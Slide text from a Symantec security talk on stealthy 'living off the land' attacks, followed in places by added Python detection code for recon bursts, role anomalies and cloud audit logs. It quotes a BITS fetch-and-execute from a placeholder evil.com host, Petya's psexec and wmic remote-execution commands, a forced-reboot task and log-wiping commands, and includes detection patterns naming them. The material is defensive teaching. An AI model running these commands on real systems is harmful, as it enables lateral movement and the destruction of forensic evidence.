Post on 08-Nov-2018
08/05/18
1
Beware of the Ninjas
Felix Leder <Felix_Leder@Symantec.com>
In a Nutshell – Make the Internet a safer place
• Symantec
– Commercial Org
– High quality products
– Malware Analysis Systems
– Huuuuge lot of data
– Patents
• The Honeynet Project
– Non-Profit Org
– Open Source
– Cuckoo Sandbox (2010)
– Sharing what we can
– Public training
Copyright © 2015 Symantec Corporation
Defender's View
Old School - Prevention
I ask myself IF I will get breached.
What can I do to PREVENT breaches?
New School - Detection
I ask myself WHEN I will get breached.
What can I do to DETECT breaches?
What will I do in such an event? (DFIR aware)
Attacker's View
Old School – Malicious Software
Mission: Do everything to stay undetected
Tactics:
• Obfuscation
• Anti-security tools
New School - Ninja
Mission: Hide as long as possible
Tactics:
• Hide in the noise
• Stay outside monitoring domains
• Leave minimal traces
Software does not breach organizations – People do
Some try…
http://www.chinadaily.com.cn/china/2015-04/11/content_20411580.htm#Content
Some do it better
https://www.pinterest.ie/pin/272467846179842314/
Some are almost impossible to spot
https://www.pinterest.ie/pin/298996862741834388/
Security Tool Awareness
Ninjas adjust
Gozi: User Interaction to the Next Level
• Payload encrypted with RANDOM KEY
• Nobody knows random key (not even malware itself)
• Idea: Brute force key based on mouse move
• Eventually a real user decrypts the payload
[Figure: "Decrypt (?)" of the encrypted payload, trying Key: 5 ✗, Key: 1 ✗, Key: 6 ✗, Key: 9 ✗, Key: 7 ✓]
AI to the max - Ghost User
Leave no trace
Duqu – 2010-2011
Example: Duqu 2.0
• Infection:
– Documents / spear phishing
– Privilege escalation
– Pass-the-hash
• No Persistence on host
– Task scheduler
– Remote execution
• In Memory only (evading forensics)
• Three 0-days used
• Internal C2 forwarding
• Traffic hiding in pictures
• Changing encryption
[Figure: Duqu 2.0 network diagram with the Domain Controller, labelled "Hide"]
Looking at the ninja in the host
Let Windows do the dirty work
• If Windows/Microsoft is trusted, let it do the dirty work
[Figure: malware asks the service "Fetch http://evil.com/malw.exe and then EXECUTE it"; the service answers "OK!"]
Background Intelligent Transfer Service / BITS
Go where there's no monitoring - WMI
• Windows Management Instrumentation
• No suspicious APIs; just ask Windows
[Figure: WMI query against Win32_NetworkAdapterConfiguration]
Bluwimps - Persistence through WMI
Poweliks - fileless in the registry
• Folder opened in File open dialog / explorer…
Living off the land – Information Gathering
• Many attack groups use common system tools during their attacks

WATERBUG / TURLA
• systeminfo
• net view
• net view /domain
• tasklist /v
• gpresult /z
• arp -a
• net share
• net use
• net user administrator
• net user /domain
• net user administrator /domain
• tasklist /fi

APPLEWORM / LAZARUS
• hostname
• whoami
• ver
• ipconfig -all
• ping www.google.com
• query user
• net user
• net view
• net view /domain
• tasklist /svc
• netstat -ano | find \TCP\
• msdtc [IP] [port]

BILLBUG
• net user
• ipconfig /all
• net start
• systeminfo
• gpresult
Dual-Use Tools: Petya
Petya uses dual-use tools
• Threat is DLL executed by rundll32.exe
• Uses recompiled version of LSADump Mimikatz to get passwords
• Uses PsExec to propagate
– \\[server_name]\admin$\perfc.dat
– psexec rundll32.exe c:\windows\perfc.dat #1 <rand>
• Uses WMI to propagate if PsExec fails
– wmic.exe /node:[IP Address] /user:[USERNAME] /password:[PASSWORD] process call create "%System%\rundll32.exe \"%Windows%\perfc.dat\" #160"
• Scheduled task to restart into the malicious MBR payload
– schtasks /RU "SYSTEM" /Create /SC once /TN "" /TR "%system%\shutdown.exe /r /f" /ST 14:42
• Deletes log files to hide traces
– wevtutil cl Setup & wevtutil cl System & … & fsutil usn deletejournal /D %C:
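The following Python is an added example, not code from the talk or from Symantec. It shows how a defender turns the two slides above, the information-gathering tool lists and the Petya command chain, into detection logic over process-creation events: a "recon burst" rule that counts distinct reconnaissance commands per host inside a short window, and single-event rules for the high-severity Petya steps (wmic/psexec remote execution, event-log clearing, USN-journal deletion, a scheduled forced reboot). The event schema, host names, paths, addresses and the sample events are constructed, and the window and threshold are assumptions to tune against your own telemetry.

```python
"""Flag living-off-the-land activity in process-creation events (constructed sample data).

Two kinds of findings:
  * recon-burst: several distinct reconnaissance commands from one host inside a
    short window (the tool lists attributed to Waterbug, Appleworm and Billbug)
  * high-severity single events: remote execution via wmic/psexec, log clearing,
    USN-journal deletion, a scheduled forced reboot (the Petya chain)
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Reconnaissance commands from the slide lists. A trailing space means "with arguments".
RECON_PREFIXES = (
    "systeminfo", "net view", "net user", "net share", "net use", "net start",
    "tasklist", "gpresult", "arp -a", "hostname", "whoami", "ver", "ipconfig",
    "query user", "netstat", "ping ",
)

# Single events that justify an alert on their own. The patterns match the technique,
# not one sample's exact path or argument values.
HIGH_SEVERITY = [
    ("log-clearing",     re.compile(r"\bwevtutil(\.exe)?\s+cl\b", re.I)),
    ("usn-journal-wipe", re.compile(r"\bfsutil(\.exe)?\s+usn\s+deletejournal\b", re.I)),
    ("wmi-remote-exec",  re.compile(r"\bwmic(\.exe)?\s+/node:.*\bprocess\s+call\s+create\b", re.I)),
    ("psexec-rundll32",  re.compile(r"\bpsexec(\.exe)?\b.*\brundll32(\.exe)?\b", re.I)),
    ("scheduled-reboot", re.compile(r"\bschtasks(\.exe)?\b.*/create\b.*\bshutdown", re.I)),
]


def normalize(cmdline):
    """'C:\\Windows\\System32\\net.exe view /domain' -> 'net view /domain'."""
    parts = cmdline.strip().split()
    if not parts:
        return ""
    head = parts[0].strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if head.endswith(".exe"):
        head = head[:-4]
    return " ".join([head] + [p.lower() for p in parts[1:]])


def recon_command(cmdline):
    """Return the normalized command if it is one of the recon tools, else None."""
    cmd = normalize(cmdline)
    for prefix in RECON_PREFIXES:
        if cmd == prefix.strip() or cmd.startswith(prefix.rstrip() + " "):
            return cmd
    return None


def detect(events, window=timedelta(minutes=10), recon_threshold=4):
    """events: dicts with host, user, ts (datetime), cmdline. Returns findings sorted by time."""
    findings = []
    per_host = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        for rule, rx in HIGH_SEVERITY:
            if rx.search(ev["cmdline"]):
                findings.append({"severity": "high", "rule": rule, "host": ev["host"],
                                 "user": ev["user"], "ts": ev["ts"], "cmdline": ev["cmdline"]})
        cmd = recon_command(ev["cmdline"])
        if cmd:
            per_host[ev["host"]].append((ev["ts"], ev["user"], cmd))
    # Sliding window per host: report the largest set of distinct recon commands seen
    # within `window`. One 'ipconfig' on a workstation is noise; five tools in a row is not.
    for host, seq in per_host.items():
        best, best_at, start = set(), None, 0
        for end in range(len(seq)):
            while seq[end][0] - seq[start][0] > window:
                start += 1
            distinct = {c for _, _, c in seq[start:end + 1]}
            if len(distinct) > len(best):
                best, best_at = distinct, seq[end]
        if len(best) >= recon_threshold:
            findings.append({"severity": "medium", "rule": "recon-burst", "host": host,
                             "user": best_at[1], "ts": best_at[0], "commands": sorted(best)})
    return sorted(findings, key=lambda f: f["ts"])


# Constructed sample events (not real telemetry; hosts, users and paths are placeholders).
T0 = datetime(2018, 5, 8, 9, 0, 0)
SAMPLE_EVENTS = [
    {"host": "WS-17", "user": "CORP\\jdoe", "ts": T0, "cmdline": "hostname"},
    {"host": "WS-17", "user": "CORP\\jdoe", "ts": T0 + timedelta(seconds=20), "cmdline": "whoami"},
    {"host": "WS-17", "user": "CORP\\jdoe", "ts": T0 + timedelta(minutes=1),
     "cmdline": "C:\\Windows\\System32\\net.exe view /domain"},
    {"host": "WS-17", "user": "CORP\\jdoe", "ts": T0 + timedelta(minutes=2), "cmdline": "tasklist /v"},
    {"host": "WS-17", "user": "CORP\\jdoe", "ts": T0 + timedelta(minutes=4), "cmdline": "ipconfig /all"},
    # A lone ipconfig plus normal office work stays below the threshold.
    {"host": "WS-03", "user": "CORP\\asmith", "ts": T0, "cmdline": "ipconfig /all"},
    {"host": "WS-03", "user": "CORP\\asmith", "ts": T0 + timedelta(minutes=1),
     "cmdline": '"C:\\Windows\\System32\\notepad.exe" report.txt'},
    # Petya-style log clearing and WMI remote execution (address, account and DLL are placeholders).
    {"host": "SRV-02", "user": "NT AUTHORITY\\SYSTEM", "ts": T0 + timedelta(hours=1),
     "cmdline": "C:\\Windows\\System32\\wevtutil.exe cl System"},
    {"host": "SRV-02", "user": "NT AUTHORITY\\SYSTEM", "ts": T0 + timedelta(hours=1, minutes=1),
     "cmdline": 'C:\\Windows\\System32\\wbem\\wmic.exe /node:10.0.0.12 /user:CORP\\svc /password:REDACTED '
                'process call create "C:\\Windows\\System32\\rundll32.exe C:\\Windows\\payload.dll,#1"'},
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f["ts"].time(), f["severity"], f["rule"], f["host"], f.get("commands", f.get("cmdline")))
```

The recon rule is deliberately about distinct commands, not counts: a help-desk script that runs `ipconfig /all` fifty times is routine, while `hostname`, `whoami`, `net view /domain`, `tasklist /v` and `ipconfig /all` from one interactive session inside a few minutes is the pattern on the slide. Feed it Sysmon event 1 or Windows 4688 records with the command line captured, and keep the high-severity rules separate so that a single `wevtutil cl` alerts even when no reconnaissance preceded it.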
Not just Windows
• HiddenLotus on OSX using shell commands
[Figure: clean sample next to malicious sample]
Forensics and Incident Management
• Background Intelligent Transfer Service
• Windows Management Instrumentation
• Dual use tools
→ Not necessarily files on disk
→ (a lot of) Activities started
→ Know your environment → spot anomalies
• Powershell on secretaries' computer?
• Windows downloading updates from Russia, China, or Sweden?
• HR department invoking net view /domain commands
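The slide's three anomaly questions are context checks: the same command is routine from one role and remarkable from another, and a download is fine from an update server and not from anywhere else. The Python below is an added example, not code from the talk or from Symantec, showing those checks as code: a department lookup for the account, a set of tools that are normal for administrators only, and an allowlist of expected update hosts for BITS download sources. The directory, the tool and host allowlists, and the sample events are constructed assumptions; your own values come from asset inventory and patch infrastructure.

```python
"""Context checks for "know your environment": who ran which tool, and where Windows
is fetching updates from. Constructed directory and sample data, not real telemetry."""
from urllib.parse import urlparse

# Hypothetical directory: which department each account belongs to.
DIRECTORY = {
    "corp\\hr.clerk": "hr",
    "corp\\front.desk": "reception",
    "corp\\sec.admin": "it-ops",
}

# Tools that are routine for administrators and unusual elsewhere
# (the slide's examples: PowerShell at the front desk, 'net view /domain' from HR).
ADMIN_TOOLS = {"powershell", "pwsh", "net", "net1", "wmic", "psexec", "schtasks",
               "tasklist", "gpresult", "netstat", "arp", "nltest", "dsquery"}
ADMIN_DEPARTMENTS = {"it-ops", "secops"}

# Where update downloads are expected to come from (assumed allowlist; add your WSUS host).
UPDATE_HOSTS = {"windowsupdate.com", "update.microsoft.com", "download.microsoft.com",
                "wsus.corp.example"}


def tool_name(cmdline):
    """First token of the command line, without path or '.exe' (handles a quoted path)."""
    s = cmdline.strip()
    head = s[1:s.index('"', 1)] if s.startswith('"') else s.split()[0]
    head = head.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return head[:-4] if head.endswith(".exe") else head


def check_process(ev):
    """Return a reason string if this process event is out of place for the user's role."""
    dept = DIRECTORY.get(ev["user"].lower())
    tool = tool_name(ev["cmdline"])
    if dept is None:
        return f"unknown account {ev['user']} ran {tool} on {ev['host']}"
    if tool in ADMIN_TOOLS and dept not in ADMIN_DEPARTMENTS:
        return f"{tool} run by {dept} user {ev['user']} on {ev['host']}"
    return None


def check_bits_job(job):
    """Return a reason string if a BITS download source is not an expected update host."""
    host = (urlparse(job["url"]).hostname or "").lower()
    if any(host == h or host.endswith("." + h) for h in UPDATE_HOSTS):
        return None
    return f"{job['host']} fetching {job['url']} via BITS from unexpected source {host}"


def review(process_events, bits_jobs):
    """Apply both checks; returns the list of reasons (empty when nothing stands out)."""
    reasons = [check_process(ev) for ev in process_events] + [check_bits_job(j) for j in bits_jobs]
    return [r for r in reasons if r]


# Constructed sample input: process-creation events and BITS jobs.
PROCESS_EVENTS = [
    {"host": "WS-HR-04", "user": "CORP\\hr.clerk", "cmdline": "net view /domain"},
    {"host": "WS-IT-01", "user": "CORP\\sec.admin", "cmdline": "net view /domain"},
    {"host": "WS-RCP-02", "user": "CORP\\front.desk",
     "cmdline": "powershell.exe -File C:\\Users\\Public\\run.ps1"},
    {"host": "WS-RCP-02", "user": "CORP\\front.desk",
     "cmdline": '"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE" letter.docx'},
    {"host": "WS-RCP-02", "user": "CORP\\contractor7", "cmdline": "whoami"},
]
BITS_JOBS = [
    {"host": "WS-HR-04", "url": "https://download.windowsupdate.com/d/msdownload/update/pkg.cab"},
    {"host": "WS-HR-04", "url": "http://cdn.example.net/update.exe"},
]

if __name__ == "__main__":
    for reason in review(PROCESS_EVENTS, BITS_JOBS):
        print(reason)
```

An account missing from the directory is reported rather than silently passed, because "who is this?" is exactly the question the analyst needs raised. The BITS check uses suffix matching on the host so `download.windowsupdate.com` passes under `windowsupdate.com`; on a real host the job list comes from `bitsadmin /list /allusers` or `Get-BitsTransfer -AllUsers`, and the same allowlist applies to proxy logs for the BITS user agent.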
Hide behind the Clouds
Short History of Malware C2
Twitter Botnet as example
• Prevention: Block Twitter?
• Incident Response: Retrospective Twitter traffic analysis?
– Signal-to-noise ratio low
– TLS – blind spots?
• Endpoint monitoring?
• Encrypted traffic mgmt.?
• NSS Key Log File?
Inception Framework
• Targeted attack (mostly Russian targets)
• Exfiltrate to Cloud provider
Fake Updates campaigns
• Use of global cloud services
Can you rule out the cloud?
HTTPS/TLS
Direct cloud transfers
Find the breach
• What went where and when?
• What was shared with whom?
• What type of files were transferred? (docs w/ active content, exe, …)
• What was modified by whom?
• Trace deleted files?
• Scale: 1000 users w/ 1000 file operations per day
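Each question on the slide is a query over the cloud service's audit log, and at the stated scale (a million operations per day) the log has to be indexed once rather than scanned per question. The Python below is an added example, not code from the talk or from Symantec, that answers the five questions against a constructed audit log; the event schema (`ts`, `user`, `action`, `path`, `target`), the file-type classes and the sample events are assumptions, since every cloud provider exports its own format.

```python
"""Reconstruct cloud file activity from an audit log to answer:
what went where and when, what was shared with whom, which file types moved,
what was modified by whom, and the history of deleted files.
Events are indexed once (by path and by user) so each question is a lookup."""
import os
from collections import defaultdict
from datetime import datetime

ACTIVE_CONTENT = {".docm", ".xlsm", ".pptm", ".dotm", ".xlam"}          # Office files that can carry macros
EXECUTABLE = {".exe", ".dll", ".scr", ".js", ".vbs", ".ps1", ".hta", ".msi"}
TRANSFER_ACTIONS = {"upload", "download", "share"}


def classify(path):
    """File-type class the slide cares about: active-content document, executable, or other."""
    ext = os.path.splitext(path)[1].lower()
    if ext in ACTIVE_CONTENT:
        return "active-content"
    if ext in EXECUTABLE:
        return "executable"
    return "other"


class CloudAudit:
    def __init__(self, events):
        self.events = sorted(events, key=lambda e: e["ts"])
        self.by_path = defaultdict(list)
        self.by_user = defaultdict(list)
        for ev in self.events:
            self.by_path[ev["path"]].append(ev)
            self.by_user[ev["user"]].append(ev)

    def transfers(self):
        """What went where and when: every upload/download with its destination."""
        return [(ev["ts"], ev["user"], ev["action"], ev["path"], ev["target"])
                for ev in self.events if ev["action"] in ("upload", "download")]

    def external_shares(self, corp_domain):
        """What was shared with whom, restricted to recipients outside the company."""
        return [(ev["path"], ev["target"], ev["user"]) for ev in self.events
                if ev["action"] == "share" and not ev["target"].lower().endswith("@" + corp_domain)]

    def risky_files(self):
        """Which transferred or shared files can carry active content or are executables."""
        moved = {ev["path"] for ev in self.events if ev["action"] in TRANSFER_ACTIONS}
        return {p: classify(p) for p in sorted(moved) if classify(p) != "other"}

    def modifications(self):
        """What was modified by whom."""
        out = defaultdict(list)
        for ev in self.events:
            if ev["action"] == "modify":
                out[ev["path"]].append(ev["user"])
        return dict(out)

    def deleted_file_history(self):
        """Trace deleted files: the full timeline of every path whose last event is a delete."""
        return {p: [(ev["ts"], ev["user"], ev["action"]) for ev in evs]
                for p, evs in self.by_path.items() if evs[-1]["action"] == "delete"}


# Constructed audit log. 'target' is the destination service for uploads, the client
# address for downloads, the recipient for shares, and empty otherwise.
SAMPLE_EVENTS = [
    {"ts": datetime(2018, 5, 8, 9, 1), "user": "jdoe", "action": "upload", "path": "/finance/q2.xlsm", "target": "corp-box"},
    {"ts": datetime(2018, 5, 8, 9, 5), "user": "jdoe", "action": "share", "path": "/finance/q2.xlsm", "target": "partner@example.org"},
    {"ts": datetime(2018, 5, 8, 9, 10), "user": "asmith", "action": "modify", "path": "/hr/salaries.docx", "target": ""},
    {"ts": datetime(2018, 5, 8, 9, 12), "user": "jdoe", "action": "upload", "path": "/tools/helper.exe", "target": "personal-dropbox"},
    {"ts": datetime(2018, 5, 8, 9, 20), "user": "jdoe", "action": "delete", "path": "/finance/q2.xlsm", "target": ""},
    {"ts": datetime(2018, 5, 8, 9, 30), "user": "asmith", "action": "share", "path": "/hr/salaries.docx", "target": "bob@corp.example"},
    {"ts": datetime(2018, 5, 8, 10, 0), "user": "bob", "action": "download", "path": "/hr/salaries.docx", "target": "10.0.5.7"},
]

if __name__ == "__main__":
    audit = CloudAudit(SAMPLE_EVENTS)
    print("transfers:", audit.transfers())
    print("external shares:", audit.external_shares("corp.example"))
    print("risky files:", audit.risky_files())
    print("modified:", audit.modifications())
    print("deleted:", audit.deleted_file_history())
```

The deleted-file trace is the part the slide flags with a question mark: once the object is gone, the audit log is the only record of who uploaded it, whom it was shared with and when it vanished, which is why the indexing is done on the full history rather than on the current file listing.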
Cloud forensics
Ready for Cloud IR?
• Can you look into encrypted traffic? (post-breach)
• Overview over activities in your Cloud services? (spot breaches)
– What actions would be suspicious?
– Different user groups / different behaviors?
• Procedures for IR? (post-breach)
Running your own Cloud service
Do NOT ask: "If I will get breached?"
CloudPets
• Send messages to Pet
• Pet can record messages and send back
• MongoDB with all accounts publicly accessible on Internet
– User accounts
– Messages
https://www.troyhunt.com/data-from-connected-cloudpets-teddy-bears-leaked-and-ransomed-exposing-kids-voice-messages/
Becoming more Intimate
And more intimate…
It happens every day…
https://cloudpets-prod.s3.amazonaws.com/9...51.wav
Incident process
[Figure: incident process compared for on-premise, cloud use and cloud service operation, plotted by availability of tools against complexity]
Clear boundaries → shorten discovery
Define "Normality"
• Yes, policies are a pain
• What is normal? What is known to be outside the norm?
Learn "Normality"
• Every cloud app is different
• Standard behavior can be learned
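"Standard behavior can be learned" means building a per-group profile from a trusted window of the cloud app's audit history and then scoring new activity against it, so that each app gets its own notion of normal rather than one hand-written policy. The Python below is an added example, not code from the talk or from Symantec. The profile learned is deliberately small: which actions each user group performs in each app, and the highest per-user volume of each action; new events are flagged when the action was never seen for that group, or when one user's volume exceeds a multiple of the learned maximum. The group and app names, the history, the new events and the volume factor are constructed assumptions.

```python
"""Learn a per-group behaviour baseline from cloud-app audit history and score new events.
Events are (group, app, user, action) tuples; constructed sample data, not real logs."""
from collections import Counter, defaultdict


def learn_baseline(history):
    """Returns {(group, app): {"actions": Counter(action -> count),
                               "max_per_user": {action: highest count any single user had}}}."""
    actions = defaultdict(Counter)
    per_user = defaultdict(Counter)  # (group, app, action) -> Counter(user -> count)
    for group, app, user, action in history:
        actions[(group, app)][action] += 1
        per_user[(group, app, action)][user] += 1
    baseline = {}
    for (group, app), ctr in actions.items():
        baseline[(group, app)] = {
            "actions": ctr,
            "max_per_user": {a: max(per_user[(group, app, a)].values()) for a in ctr},
        }
    return baseline


def score(baseline, new_events, volume_factor=3):
    """Flag (user, app, action) combinations in the period under review that are either
    unseen for the user's group or far above the highest volume the group showed before."""
    volumes = Counter()
    for group, app, user, action in new_events:
        volumes[(group, app, user, action)] += 1
    findings = []
    for (group, app, user, action), n in sorted(volumes.items()):
        prof = baseline.get((group, app))
        if prof is None:
            findings.append((user, app, action, f"group '{group}' never used {app} in the baseline"))
        elif action not in prof["actions"]:
            findings.append((user, app, action, f"action '{action}' unseen for group '{group}'"))
        elif n > volume_factor * prof["max_per_user"][action]:
            findings.append((user, app, action,
                             f"{n} events vs. baseline max {prof['max_per_user'][action]} per user"))
    return findings


# Constructed history (a trusted window) and a constructed review period.
HISTORY = (
    [("hr", "box", "alice", "view")] * 5 + [("hr", "box", "alice", "edit")] * 2
    + [("hr", "box", "bob", "view")] * 3
    + [("it-ops", "box", "carol", "view")] * 4 + [("it-ops", "box", "carol", "download")] * 5
    + [("it-ops", "box", "carol", "share")] * 1 + [("it-ops", "box", "dave", "download")] * 3
)
NEW_EVENTS = (
    [("hr", "box", "alice", "download")] * 2        # HR never downloaded before
    + [("hr", "box", "bob", "view")] * 2             # normal
    + [("it-ops", "box", "carol", "download")] * 20  # 20 > 3 x the learned max of 5
    + [("sales", "box", "eve", "view")]              # group absent from the baseline
)

if __name__ == "__main__":
    for user, app, action, why in score(learn_baseline(HISTORY), NEW_EVENTS):
        print(f"{user:6} {app:4} {action:9} {why}")
```

The baseline is only as good as the window it was learned from, so it should be built from a period you have already reviewed and re-learned on a schedule; the "unseen action" rule is the one that catches the slide's earlier question of an HR user suddenly running exports, while the volume rule catches an administrator account doing its usual job at an unusual rate.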
Example: Virtual Private Cloud
[Figure: VPC diagram]
Example: Containers
https://wallhere.com/en/wallpaper/600531
Example: Container & Microservices
[Figure: containers drawn as whales: Orca, Gray, Humpback, Blue, Shark, Fin, Minke]
Example: Microservice workflows
[Figure: workflow between the same whale-named microservices]
Secure VM in the Cloud (like on-premise)
[Figure: Host IDS, Whitelist, EDR]
The more you know, the faster you react
Anti Forensics
Smokeloader a.k.a. Dofoil
• Extendable Trojan Kit
• Ring3-rootkit (32-bit)
– Hide processes
– Hide registry
– Hide files
• Kill security tools
• Inject into explorer.exe
[Figure: process memory with benign code, data and injected malicious code]
Not just Windows
• HiddenLotus on OSX with anti-forensics
[Figure: clean sample next to malicious sample]
Get your facts straight ☺
http://westernriverimages.photoshelter.com/image/I0000.gezYGWvQX4
Cyberwar: Iranian attack on Bowman dam, 2013
http://www.wsj.com/articles/iranian-hackers-infiltrated-new-york-dam-in-2013-1450662559
Summary
• Attackers will always adjust – Ninjas hide in the noise
• Attackers will always use systems in unusual ways
• Log & record the he** out of your systems
– System logs (remote)
– EDR
– Network logs (think encrypted traffic)
• Define/learn what is "normal"
– Users
– Systems
– Architecture
• Be the first to notice → Set up alerting
Thank you!
Copyright © 2015 Symantec Corporation. All rights reserved. Symantec and the Symantec Logo are trademarks or registered trademarks of Symantec Corporation or its affiliates in the U.S. and other countries. Other names may be trademarks of their respective owners.
This document is provided for informational purposes only and is not intended as advertising. All warranties relating to the information in this document, either express or implied, are disclaimed to the maximum extent allowed by law. The information in this document is subject to change without notice.
Felix_Leder@Symantec.com